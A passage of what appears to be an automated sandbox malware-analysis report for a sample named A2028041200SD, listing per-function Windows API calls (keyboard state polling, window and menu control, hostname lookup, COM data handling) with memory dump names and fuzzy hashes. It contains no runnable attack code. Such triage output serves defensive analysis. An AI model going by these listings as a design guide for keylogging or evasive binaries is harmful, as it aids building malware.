                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00937852
                                                                        • Sleep.KERNEL32(000000FA), ref: 0093785D
                                                                        • IsWindow.USER32 ref: 00937869
                                                                        • EndDialog.USER32(00000000), ref: 0093787A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1194449130-3405671355
                                                                        • Opcode ID: 9e67a7e32b0bee191ca6813ecc4f9f5eb90373b8932cd945394ef654ed0c6ce6
                                                                        • Instruction ID: 8ee5b93cd1bd0a396f81083b2f1e45aaef4ec8a23f9760dc370131641b196ca7
                                                                        • Opcode Fuzzy Hash: 9e67a7e32b0bee191ca6813ecc4f9f5eb90373b8932cd945394ef654ed0c6ce6
                                                                        • Instruction Fuzzy Hash: F9216FB122D209BFE7149BA0ED89B2A7FB9FF84768F408114F50A92162CB714D40FF20
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • CoInitialize.OLE32(00000000), ref: 0094034B
                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009403DE
                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 009403F2
                                                                        • CoCreateInstance.OLE32(0097DA8C,00000000,00000001,009A3CF8,?), ref: 0094043E
                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009404AD
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00940505
                                                                        • _memset.LIBCMT ref: 00940542
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0094057E
                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009405A1
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 009405A8
                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009405DF
                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 009405E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                        • String ID:
                                                                        • API String ID: 1246142700-0
                                                                        • Opcode ID: cea67faeebb66ed9db08e94883124381ed5c27132a38dcab5ceb1ea85a0b03a1
                                                                        • Instruction ID: 523d1016e4a1589f50b33f6612b9c97c169becdd340a261f3d4c2144072ee8d3
                                                                        • Opcode Fuzzy Hash: cea67faeebb66ed9db08e94883124381ed5c27132a38dcab5ceb1ea85a0b03a1
                                                                        • Instruction Fuzzy Hash: ABB1C975A00209AFDB14DFA5C889DAEBBB9FF88314B148459F909EB251DB70EE41CF50
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00932ED6
                                                                        • SetKeyboardState.USER32(?), ref: 00932F41
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00932F61
                                                                        • GetKeyState.USER32(000000A0), ref: 00932F78
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00932FA7
                                                                        • GetKeyState.USER32(000000A1), ref: 00932FB8
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00932FE4
                                                                        • GetKeyState.USER32(00000011), ref: 00932FF2
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0093301B
                                                                        • GetKeyState.USER32(00000012), ref: 00933029
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00933052
                                                                        • GetKeyState.USER32(0000005B), ref: 00933060
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 431237c86c7302f7494ac69a7d6b3bb214b8233c13ce8afd3d686f0d1c2f887e
                                                                        • Instruction ID: fcf24633fda9a17fa6328f8dab0db707399f79406eb800e6066a7db88a9b0b20
                                                                        • Opcode Fuzzy Hash: 431237c86c7302f7494ac69a7d6b3bb214b8233c13ce8afd3d686f0d1c2f887e
                                                                        • Instruction Fuzzy Hash: B951E934A0879429FB35DBB488517EABFF85F11340F08859DD5C25A1C2DA54AB8CCFA2
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 0092ED1E
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0092ED30
                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0092ED8E
                                                                        • GetDlgItem.USER32(?,00000002), ref: 0092ED99
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0092EDAB
                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0092EE01
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0092EE0F
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0092EE20
                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0092EE63
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0092EE71
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0092EE8E
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0092EE9B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: a4d8d26d47129ba1be2a56e3eb8fc429d3c4b6b893702a1bf751fd9404f9acbf
                                                                        • Instruction ID: b0a327a995a526278e877d712c98af381a9d62fabdfc5ec0e37292691babb4f3
                                                                        • Opcode Fuzzy Hash: a4d8d26d47129ba1be2a56e3eb8fc429d3c4b6b893702a1bf751fd9404f9acbf
                                                                        • Instruction Fuzzy Hash: 35513FB1B10205AFDB18DF68DD85AAEBBBAFF88710F148129F519E7294D7709D408B10
                                                                        APIs
                                                                          • Part of subcall function 0090B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0090B759,?,00000000,?,?,?,?,0090B72B,00000000,?), ref: 0090BA58
                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0090B72B), ref: 0090B7F6
                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0090B72B,00000000,?,?,0090B2EF,?,?), ref: 0090B88D
                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0096D8A6
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0090B72B,00000000,?,?,0090B2EF,?,?), ref: 0096D8D7
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0090B72B,00000000,?,?,0090B2EF,?,?), ref: 0096D8EE
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0090B72B,00000000,?,?,0090B2EF,?,?), ref: 0096D90A
                                                                        • DeleteObject.GDI32(00000000), ref: 0096D91C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 641708696-0
                                                                        • Opcode ID: 8244897a99711a7255b955ee71b3e8a87e54e9cf2f0d8adb2188dff86d4844dc
                                                                        • Instruction ID: 3353d6fba15156a43f307916bdb1ecba051724c8cd97b9d20484589099546b8e
                                                                        • Opcode Fuzzy Hash: 8244897a99711a7255b955ee71b3e8a87e54e9cf2f0d8adb2188dff86d4844dc
                                                                        • Instruction Fuzzy Hash: 35619C31A26700DFDB259F18DA98B25B7F9FF95325F24461EE45686AB0C734A880EF40
                                                                        APIs
                                                                          • Part of subcall function 0090B526: GetWindowLongW.USER32(?,000000EB), ref: 0090B537
                                                                        • GetSysColor.USER32(0000000F), ref: 0090B438
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ColorLongWindow
                                                                        • String ID:
                                                                        • API String ID: 259745315-0
                                                                        • Opcode ID: dea6a50cb55570e08c8b8531238c69d23499aa9f9b1370f7a9fa181d2f8fa3ab
                                                                        • Instruction ID: 740df341bdeab9b0b4af23181da2588bc99dd43b45f10ad2022f139bd95c3606
                                                                        • Opcode Fuzzy Hash: dea6a50cb55570e08c8b8531238c69d23499aa9f9b1370f7a9fa181d2f8fa3ab
                                                                        • Instruction Fuzzy Hash: D641B132109104AFDB255F28DC89BBD3B69AF46730F584261FD698E1F6D7318D81E721
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 136442275-0
                                                                        • Opcode ID: c7aa46960a924e7c6978b065ee1ced5d23698406442a406f2abc60d24fe441de
                                                                        • Instruction ID: a8cae9f8f64b0c758cc144d03a4b886f47381b7fb3ef9496fe59d4558cb20fcb
                                                                        • Opcode Fuzzy Hash: c7aa46960a924e7c6978b065ee1ced5d23698406442a406f2abc60d24fe441de
                                                                        • Instruction Fuzzy Hash: 9D41217694511CAEDF61EB90DC45ECAB3BCEB84300F1041A6B659E2051EF71A7E58F50
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(0098DC00,0098DC00,0098DC00), ref: 0093D7CE
                                                                        • GetDriveTypeW.KERNEL32(?,009A3A70,00000061), ref: 0093D898
                                                                        • _wcscpy.LIBCMT ref: 0093D8C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 2820617543-1000479233
                                                                        • Opcode ID: 33fad440473e03b14804fe08e34df5cf26d27e10ff238be8eb6d2fd4053749e1
                                                                        • Instruction ID: 431ae8a463adab6ba35afeffd8d11b93e23150cb9ef0f17ef37453ee1982de1b
                                                                        • Opcode Fuzzy Hash: 33fad440473e03b14804fe08e34df5cf26d27e10ff238be8eb6d2fd4053749e1
                                                                        • Instruction Fuzzy Hash: A5516F35205304AFD714EF14E892B6AB7B5FF85314F10892DF59A972A2DB31EE05CA82
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 008F93AB
                                                                        • __itow.LIBCMT ref: 008F93DF
                                                                          • Part of subcall function 00911557: _xtow@16.LIBCMT ref: 00911578
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf_xtow@16
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 1502193981-2263619337
                                                                        • Opcode ID: 2411fe636c524bb542180fae5fcd058dd2ce13f476723f046990f8ed706f41c3
                                                                        • Instruction ID: c5c970838b189951d0f49023708f77f97628163456b2b620690fe43ce9ed4782
                                                                        • Opcode Fuzzy Hash: 2411fe636c524bb542180fae5fcd058dd2ce13f476723f046990f8ed706f41c3
                                                                        • Instruction Fuzzy Hash: BA41A27160420DEBDB249F78D942FBA77E8FB84304F20446AE689D72D1EA359A41CB51
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0095A259
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0095A260
                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0095A273
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0095A27B
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0095A286
                                                                        • DeleteDC.GDI32(00000000), ref: 0095A28F
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0095A299
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0095A2AD
                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0095A2B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                        • String ID: static
                                                                        • API String ID: 2559357485-2160076837
                                                                        • Opcode ID: b75d5c296f4c109aeac5f95849171a1aa7f944b685884b843a7399c3090eeda5
                                                                        • Instruction ID: e7b310f5af3844ee781b3c216d9c80ce6b21fff3e4bf7173086d820ac60749dd
                                                                        • Opcode Fuzzy Hash: b75d5c296f4c109aeac5f95849171a1aa7f944b685884b843a7399c3090eeda5
                                                                        • Instruction Fuzzy Hash: 75318D32115218ABDF119FA5DC4AFEA3B7DFF09761F100314FA29A60A0C736D855EBA4
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 2620052-3771769585
                                                                        • Opcode ID: 6f7c404f49635d1a6a606b3e63f001be47a26e35cdb91bcb8345a76517e2349e
                                                                        • Instruction ID: 6369b1b016ea9a653f2d7f7bfb4230352451e80e9aabd8fec06ae9684a47480f
                                                                        • Opcode Fuzzy Hash: 6f7c404f49635d1a6a606b3e63f001be47a26e35cdb91bcb8345a76517e2349e
                                                                        • Instruction Fuzzy Hash: E611B776508219BFCB246B60AC4AFEA77BCDF80710F004065F149A6091EF75DAC59B50
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00915047
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • __gmtime64_s.LIBCMT ref: 009150E0
                                                                        • __gmtime64_s.LIBCMT ref: 00915116
                                                                        • __gmtime64_s.LIBCMT ref: 00915133
                                                                        • __allrem.LIBCMT ref: 00915189
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009151A5
                                                                        • __allrem.LIBCMT ref: 009151BC
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009151DA
                                                                        • __allrem.LIBCMT ref: 009151F1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0091520F
                                                                        • __invoke_watson.LIBCMT ref: 00915280
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                        • String ID:
                                                                        • API String ID: 384356119-0
                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                        • Instruction ID: 94e07e8d91465fc1bdd3048d8986ffa5a164aa0a5231471edb85a594ba6682b9
                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                        • Instruction Fuzzy Hash: D5710676B00B1AEBD714AF68DC41BEAB3A8AF94764F164629F414D6281E770D9C08BD0
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00934DF8
                                                                        • GetMenuItemInfoW.USER32(009B1708,000000FF,00000000,00000030), ref: 00934E59
                                                                        • SetMenuItemInfoW.USER32(009B1708,00000004,00000000,00000030), ref: 00934E8F
                                                                        • Sleep.KERNEL32(000001F4), ref: 00934EA1
                                                                        • GetMenuItemCount.USER32(?), ref: 00934EE5
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00934F01
                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00934F2B
                                                                        • GetMenuItemID.USER32(?,?), ref: 00934F70
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00934FB6
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00934FCA
                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00934FEB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                        • String ID:
                                                                        • API String ID: 4176008265-0
                                                                        • Opcode ID: e565de194c345943c30ed96ff4b19c4705a20c49e89d431f430e9ed46de28080
                                                                        • Instruction ID: e9c4a4ba15ec9aed47a24a4e595ee7a462b83bf546b8257b5b92eaed99770e78
                                                                        • Opcode Fuzzy Hash: e565de194c345943c30ed96ff4b19c4705a20c49e89d431f430e9ed46de28080
                                                                        • Instruction Fuzzy Hash: 2961AB71A04249AFDB20CFA4D988AAE7BB8FB45308F1A0559F806A7251E731BD44DF21
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00959C98
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00959C9B
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00959CBF
                                                                        • _memset.LIBCMT ref: 00959CD0
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00959CE2
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00959D5A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 830647256-0
                                                                        • Opcode ID: c34960cf6cee656947d7406e3174a132e6f662a0e788213c99bb7a79302951e8
                                                                        • Instruction ID: 901b6a8915dabb265fe5e0b4d0c14afb090218b2fccee7c1f470d27dd8ea8310
                                                                        • Opcode Fuzzy Hash: c34960cf6cee656947d7406e3174a132e6f662a0e788213c99bb7a79302951e8
                                                                        • Instruction Fuzzy Hash: 3C617B75A00208EFEB20DFA8CC81EEE77B8EF49714F14415AFE08A7291D774A945DB50
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009294FE
                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00929549
                                                                        • VariantInit.OLEAUT32(?), ref: 0092955B
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0092957B
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 009295BE
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 009295D2
                                                                        • VariantClear.OLEAUT32(?), ref: 009295E7
                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 009295F4
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009295FD
                                                                        • VariantClear.OLEAUT32(?), ref: 0092960F
